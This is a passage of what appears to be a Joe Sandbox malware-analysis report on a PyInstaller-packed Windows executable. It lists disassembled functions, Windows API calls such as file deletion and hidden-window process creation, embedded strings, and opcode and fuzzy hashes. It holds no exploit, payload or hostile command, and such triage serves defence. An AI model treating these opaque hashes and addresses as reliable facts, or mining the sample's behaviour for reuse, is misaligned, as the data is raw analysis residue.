                                                              • API String ID: 2848303308-1553575800
                                                              • Opcode ID: 0056acba03f87a82fc2f6ebcffcab0de4440760040fe549533ff5503d775fa8e
                                                              • Instruction ID: 08d80f7979dea2919f7922c4f715c99fe3e2872e8fbb099ad1690b38e7cd3a4e
                                                              • Opcode Fuzzy Hash: 0056acba03f87a82fc2f6ebcffcab0de4440760040fe549533ff5503d775fa8e
                                                              • Instruction Fuzzy Hash: 5AF105A0F0DA1786FB66DB25A870E7532ACAF45B80F144539E83E427EDDF2CA9409740
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 3215553584-0
                                                              • Opcode ID: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
                                                              • Instruction ID: 99fa2097cb86ae68a8387e59ae44a807796e822b2923f7a129008aa34f269cf6
                                                              • Opcode Fuzzy Hash: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
                                                              • Instruction Fuzzy Hash: 2151D671A096D286EE249A659C0277A7291BF84BA4F144734DD6C877C7CF3ED401AF03
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLastPointer
                                                              • String ID:
                                                              • API String ID: 2976181284-0
                                                              • Opcode ID: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
                                                              • Instruction ID: aa83118576ff7483c60f9ce2848cdab35300d89d2794ca886ea1c8054ce5c15b
                                                              • Opcode Fuzzy Hash: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
                                                              • Instruction Fuzzy Hash: B9112361708A8281DF208B25BC041696362BB81BF0F540335EE7D8BBEACF3DD0119B03
                                                              APIs
                                                              • RtlFreeHeap.NTDLL(?,?,?,00007FF626662D92,?,?,?,00007FF626662DCF,?,?,00000000,00007FF626663295,?,?,?,00007FF6266631C7), ref: 00007FF62665A9CE
                                                              • GetLastError.KERNEL32(?,?,?,00007FF626662D92,?,?,?,00007FF626662DCF,?,?,00000000,00007FF626663295,?,?,?,00007FF6266631C7), ref: 00007FF62665A9D8
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 485612231-0
                                                              • Opcode ID: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
                                                              • Instruction ID: 822bb9ffbdabdf6e7b509b442c86d2c31bd36f5bb3d1eb928ac2316602c99e37
                                                              • Opcode Fuzzy Hash: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
                                                              • Instruction Fuzzy Hash: 0DE04610F1820382FF08ABB2AC5613812607F88B40F040034D81DE22A2EE2F6899AB03
                                                              APIs
                                                              • CloseHandle.KERNEL32(?,?,?,00007FF62665AA45,?,?,00000000,00007FF62665AAFA), ref: 00007FF62665AC36
                                                              • GetLastError.KERNEL32(?,?,?,00007FF62665AA45,?,?,00000000,00007FF62665AAFA), ref: 00007FF62665AC40
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: CloseErrorHandleLast
                                                              • String ID:
                                                              • API String ID: 918212764-0
                                                              • Opcode ID: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
                                                              • Instruction ID: b211dc0fbf423a356ea9c4b272d5ebd346eedddadc35f718031d43862950b4f7
                                                              • Opcode Fuzzy Hash: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
                                                              • Instruction Fuzzy Hash: CA218411B1C64342EF945761AC9627D1682BF84790F084239D91EC77D3CE6FA449AB43
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 3215553584-0
                                                              • Opcode ID: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
                                                              • Instruction ID: 7e2b80a5280c0e60023e0bdf626db0267802b0880f429fa676defa7570039e0a
                                                              • Opcode Fuzzy Hash: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
                                                              • Instruction Fuzzy Hash: A041E57290820287EE34DB15E95227973A5FB95B84F100135DA8EC7692CF2FE442DF93
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: _fread_nolock
                                                              • String ID:
                                                              • API String ID: 840049012-0
                                                              • Opcode ID: e68f7924d8d775e7cfc988c1acc5ef8cb841fcb1ab7bf70469a3d80c82781ba4
                                                              • Instruction ID: fabc97366a2ef45bee363c737e766f59de5ae79455965b615c215ab08a572023
                                                              • Opcode Fuzzy Hash: e68f7924d8d775e7cfc988c1acc5ef8cb841fcb1ab7bf70469a3d80c82781ba4
                                                              • Instruction Fuzzy Hash: 9721D321B196D285FE20AA126D153BAA651BF45FC4F8C4434EE4D87786CEBEE041EB43
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 3215553584-0
                                                              • Opcode ID: 2d5c35b5412ec9e3d722ee101ab37b91f6ea8aa9dcca92d1d4e84e7f868c2b8f
                                                              • Instruction ID: 2bf0ff5176d4ec4f0db51885bd11526d9dfb6d2915a44a865c1ee82f8342a4e4
                                                              • Opcode Fuzzy Hash: 2d5c35b5412ec9e3d722ee101ab37b91f6ea8aa9dcca92d1d4e84e7f868c2b8f
                                                              • Instruction Fuzzy Hash: B731BC71A1864386EB505B699C5237C2650BF80B94F420135E92D937D3CF7EA841AF23
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 3215553584-0
                                                              • Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                              • Instruction ID: 2c4e2b31da8693a1c6bd18d1e148f76c901f399f5fa8e74a3c6186818cfd95c5
                                                              • Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                              • Instruction Fuzzy Hash: FC113322A1C64282EE609F51AC0617EA264BFC5B84F554031EB4CD7A97DF3FE540AF03
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 3215553584-0
                                                              • Opcode ID: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
                                                              • Instruction ID: 3d8171733539e834dccf6e7ebd3eec6aa2586efd80bdd260be4ee267cc2bfb07
                                                              • Opcode Fuzzy Hash: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
                                                              • Instruction Fuzzy Hash: EC219572618A8286DF618F18F88137976A0FB84B94F244234E69DC76D5DF3ED8009F03
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 3215553584-0
                                                              • Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                              • Instruction ID: b72a2586c355e1571f14289c0352343f8043bef44ffe24a25b0d99a6c6feba17
                                                              • Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                              • Instruction Fuzzy Hash: C101C421A0878281EE04DF529D02169B691BF95FE0F184631EE5C97BD7CE3EE0116B03
                                                              APIs
                                                                • Part of subcall function 00007FF626649400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6266445E4,00000000,00007FF626641985), ref: 00007FF626649439
                                                              • LoadLibraryExW.KERNEL32(?,00007FF626646466,?,00007FF62664336E), ref: 00007FF626649092
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: ByteCharLibraryLoadMultiWide
                                                              • String ID:
                                                              • API String ID: 2592636585-0
                                                              • Opcode ID: 7140f7c55cf735ced6a4f02887063d730e60c19ae08c919a697b9dfe54228ee6
                                                              • Instruction ID: e2ae2faabe2693e46bdad10fd5307cd2828c8d273afb7ebc4114f1d94693b908
                                                              • Opcode Fuzzy Hash: 7140f7c55cf735ced6a4f02887063d730e60c19ae08c919a697b9dfe54228ee6
                                                              • Instruction Fuzzy Hash: 8FD08C11B2828641EE54A76BBA466295251BFC9BC4E888035EE1D43B4ADC3DC0514B01
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2093117630.00007FFDF1441000.00000040.00000001.01000000.00000013.sdmp, Offset: 00007FFDF1440000, based on PE: true
                                                              • Associated: 00000005.00000002.2093030842.00007FFDF1440000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                              • Associated: 00000005.00000002.2093117630.00007FFDF14B3000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                              • Associated: 00000005.00000002.2093117630.00007FFDF14B6000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                              • Associated: 00000005.00000002.2093117630.00007FFDF14D9000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                              • Associated: 00000005.00000002.2093117630.00007FFDF14E4000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                              • Associated: 00000005.00000002.2093117630.00007FFDF14EE000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                              • Associated: 00000005.00000002.2093710336.00007FFDF14F1000.00000080.00000001.01000000.00000013.sdmpDownload File
                                                              • Associated: 00000005.00000002.2093754080.00007FFDF14F3000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffdf1440000_Built.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast
                                                              • String ID:
                                                              • API String ID: 1452528299-0
                                                              • Opcode ID: 8e011317cca6565eb200d0702bfa620ad3ccf4c4be6080c5c317d346bd03422b
                                                              • Instruction ID: 27578453e763e3208009041be784ac6e7660f83d894d5138d4762e0542ec81c5
                                                              • Opcode Fuzzy Hash: 8e011317cca6565eb200d0702bfa620ad3ccf4c4be6080c5c317d346bd03422b
                                                              • Instruction Fuzzy Hash: 31217A32B0878086D754CB26E5906ADB7A9FBC8B90F544135EF9C43B98CF78E555CB04
                                                              APIs
                                                              • HeapAlloc.KERNEL32(?,?,?,00007FF626650D00,?,?,?,00007FF62665236A,?,?,?,?,?,00007FF626653B59), ref: 00007FF62665D6AA
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: AllocHeap
                                                              • String ID:
                                                              • API String ID: 4292702814-0
                                                              • Opcode ID: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
                                                              • Instruction ID: 9cf904d9af9fda3d3e472da0eb2d2e5a5741f22c8af222092ad4e0c6ce2fb6e9
                                                              • Opcode Fuzzy Hash: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
                                                              • Instruction Fuzzy Hash: 6EF0FE10B0934785FE5467729D5267922907F957A0F080730ED2ED57D3DE2EA441AF17
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
                                                              • String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
                                                              • API String ID: 3832162212-3165540532
                                                              • Opcode ID: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
                                                              • Instruction ID: 49114583f7f9625af0ff0251d2200d444366a34717454b278500218c095fc9e7
                                                              • Opcode Fuzzy Hash: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
                                                              • Instruction Fuzzy Hash: 35D19E32A08A8386EF209F34EC542A97764FB84B58F400239DA5D93AA8DF3DD554DB43
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2091238325.00007FFDF10C1000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FFDF10C0000, based on PE: true
                                                              • Associated: 00000005.00000002.2091206646.00007FFDF10C0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF10CD000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1125000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1139000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1149000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF115D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF130C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF130E000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1339000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF136A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1390000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF13DE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF13E4000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF13E6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1402000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF140F000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2092865869.00007FFDF1413000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2092944994.00007FFDF1414000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffdf10c0000_Built.jbxd
                                                              Similarity
                                                              • API ID: EnvironmentVariable$ByteCharMultiWide
                                                              • String ID: .rnd$HOME$RANDFILE$SYSTEMROOT$USERPROFILE
                                                              • API String ID: 2184640988-1666712896
                                                              • Opcode ID: 419c88fdedd40b7a4bd6282dbefca93637e627fdfe4ba8766129e23dca955196
                                                              • Instruction ID: ecbee0855c7df65d48c945f56745a855ef5c11c2a4b046c09b0103f63563e1ed
                                                              • Opcode Fuzzy Hash: 419c88fdedd40b7a4bd6282dbefca93637e627fdfe4ba8766129e23dca955196
                                                              • Instruction Fuzzy Hash: 1161E62670878286EB109F66A46097967A9FF55BB4B488232DE3D877DCDF3DD0098300
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2090834885.00007FFDF0FA1000.00000040.00000001.01000000.00000017.sdmp, Offset: 00007FFDF0FA0000, based on PE: true
                                                              • Associated: 00000005.00000002.2090802749.00007FFDF0FA0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090834885.00007FFDF1004000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090834885.00007FFDF1050000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090834885.00007FFDF1053000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090834885.00007FFDF10AC000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090834885.00007FFDF10B1000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090834885.00007FFDF10B4000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091138354.00007FFDF10B5000.00000080.00000001.01000000.00000017.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091174931.00007FFDF10B7000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffdf0fa0000_Built.jbxd
                                                              Similarity
                                                              • API ID: 00007E103019ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                              • String ID:
                                                              • API String ID: 2662681558-0
                                                              • Opcode ID: d7e82cabd9796a5cc19c6e8637579e4198f8c251196789a756a290bf3cbab7b6
                                                              • Instruction ID: ff856534e1a0b642073ca8378bbbd578e64e7a98fc3f38c82b0f7a4405f01c14
                                                              • Opcode Fuzzy Hash: d7e82cabd9796a5cc19c6e8637579e4198f8c251196789a756a290bf3cbab7b6
                                                              • Instruction Fuzzy Hash: 76314C72709B8186EB608F60E864BEE7364FB84758F44813ADA5E4BB98DF3CD548C710
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(?,00007FF626648B09,00007FF626643FA5), ref: 00007FF62664841B
                                                              • RemoveDirectoryW.KERNEL32(?,00007FF626648B09,00007FF626643FA5), ref: 00007FF62664849E
                                                              • DeleteFileW.KERNEL32(?,00007FF626648B09,00007FF626643FA5), ref: 00007FF6266484BD
                                                              • FindNextFileW.KERNEL32(?,00007FF626648B09,00007FF626643FA5), ref: 00007FF6266484CB
                                                              • FindClose.KERNEL32(?,00007FF626648B09,00007FF626643FA5), ref: 00007FF6266484DC
                                                              • RemoveDirectoryW.KERNEL32(?,00007FF626648B09,00007FF626643FA5), ref: 00007FF6266484E5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                              • String ID: %s\*
                                                              • API String ID: 1057558799-766152087
                                                              • Opcode ID: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
                                                              • Instruction ID: 466e76af0ee52c08d8733a8b641580a35883307bcb1a5e1f87eab11825cf6532
